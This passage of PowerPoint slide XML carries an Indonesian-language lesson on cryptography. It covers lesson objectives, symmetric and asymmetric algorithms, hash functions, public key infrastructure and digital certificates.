              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsep-konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendasari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemahaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tentang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>subjek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Tujuan Pelajaran</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hal-hal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digital.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menjelaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pentingnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>solusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40379004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Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyandikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memecahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyandikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memecahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data. Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membedakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakteristik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis-jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kasus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harfiah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> "tulisan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyandikannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
